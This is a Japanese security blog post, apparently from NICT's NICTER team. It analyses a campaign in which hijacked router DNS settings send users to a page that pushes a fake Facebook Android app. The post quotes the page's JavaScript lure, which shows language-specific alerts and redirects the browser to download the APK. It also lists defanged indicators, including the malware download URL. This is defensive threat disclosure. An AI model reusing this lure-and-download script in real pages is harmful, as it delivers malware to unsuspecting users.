NICTER Blog

Observing Cybersecurity through Darknet

Wi-Fi ルータの DNS 情報の書換え後に発生する事象について

3月15日ごろより,Twitter やブログ等で,自宅のWi-FiルータのDNS情報が書き換えられ,インターネットに接続できなかったり,不審な Androd APK がダウンロードされるという情報が公開されています.

一部の情報では,Wi-Fi ルータの脆弱性が悪用された結果マルウェア感染し,DNS 情報が書き換えられたという見解がみられますが,本エントリの執筆時点,NICTER では, Wi-Fi ルータの DNS 情報がどのような方法で書き換えられたのか.また,Mirai 亜種等 IoT ボットの活動との関連性について,事実関係を把握していません.

一方で,DNS 情報が書き換えられた後に発生する事象については,いくつかの事実が判明しました.

DNS 書き換え後に発生する攻撃の流れ

  • 悪性 DNS サーバは,自身への名前解決クエリに対してマルウェア配布用 Web サーバのIPアドレスを返答する.ただし,facebook.com と twitter.com については,正規の IP アドレスが返答される

  • Wi-Fi ルータ経由で Web サイトにアクセスしようとすると,悪性 DNS サーバによって名前解決が行われた結果,マルウェア配布用悪性 Web サーバに誘導される.そして,「Facebook 拡張ツールバッグを取付て安全性及び使用流暢性を向上します。」のアラートが表示される(図1)

スクリーンショット1(Facebook拡張ツールバッグ)

図1. Facebook拡張ツールバッグのインストールを促すアラート画面

  • ページのソースコードをみると,ブラウザの言語バージョンを確認し,言語に応じたアラート文が表示される.対応言語は韓国語,中国語簡体字,中国語繁体字,日本語の4つ.多言語に対応していることから,日本のみを狙った攻撃ではない可能性がある

    ... (snip) ...
var u = navigator.userAgent;
var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Adr') > -1;
var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
if (isAndroid) {
    var lang = (navigator.language || navigator.browserLanguage).toLowerCase()
    if (lang.startsWith("ko")) {//韩文
        window.alert("페이스북 보안확장 및 사용을 유창하기위해 설치하시길바랍니다.")
    } else if (lang.startsWith("zh-cn")) {//简体
        window.alert("请安装Facebook扩展工具包提升安全性,以及使用流畅度.")
    } else if (lang.startsWith("zh-tw") || lang.startsWith("zh-hk")) {//繁体
        window.alert("请安装Facebook扩展工具包提升安全性,以及使用流畅度.")
    } else if (lang.startsWith("ja")) {
        window.alert("Facebook拡張ツールバッグを取付て安全性及び使用流暢性を向上します。")
    } else { //其他
        window.alert("To better experience the browsing, update to the latest chrome version.")
    }
    window.location.href = "http://" + location.hostname + "/facebook.apk"
}
... (snip) ...

  • アラート表示画面の「OK」をクリックすると,悪性 Web サーバ上に置かれた Facebookアプリに偽装したマルウェアがダウンロードされる

  • マルウェアがインストールされると自動実行され,ユーザの Google アカウント情報が危険にさらされていることを示唆するアラート画面が表示される(図2)

スクリーンショット2(Google 認証情報確認画面)

図2. ユーザの Google アカウントの確認を促す画面

  • 図2. で「確認」ボタンをクリックすると,なぜかユーザの氏名と生年月日の入力を求めるページ(図3)が表示される.

スクリーンショット3(ユーザの個人情報の入力を求める偽装ページ)

図3. ユーザの個人情報の入力を求める偽装ページ

ユーザが入力した情報が攻撃者に送信される方法やタイミング等,マルウェアの挙動については現在調査中ですが,これら一連の動作のみから,攻撃者の意図を推測するのは困難な状況であると言えます.

DNS 情報の書き換えが行われる方法は不明ですが,現時点では,以下に挙げるような方法が考えられます.

  • Mirai 亜種自身が感染した Wi-Fi ルータの DNS 情報を書き換える
  • Mirai 亜種自身の感染後,C2 からの司令により,DNS 書き換えが行われる
  • 過去に話題になった DNS チェンジャーと同様の手法による DNS 情報の書き換え
  • Wi-Fi ルータ等が WAN 側からアクセス可能な状態にあり,Web 管理画面に侵入されて,DNS 情報が書き換えられる
  • Wi-Fi ルータ固有の CSRF の脆弱性を悪用

NICTER では引き続き本件の調査を行う予定です.

IoC

DNS

  • 220[.]136.176.162
  • 220[.]136.81.222
  • 220[.]136.106.4

マルウェアダウンロード URL

  • hxxp://220[.]136.76.200/facebook.apk

検体のmd5

  • 34efc3ebf51a6511c0d12cce7592db73

情報提供のお願い

本件に関して,情報を提供していただける方は,下記までご連絡いただければ幸いです.

NICTER 解析チーム
nicter-web(at)ml.nict.go.jp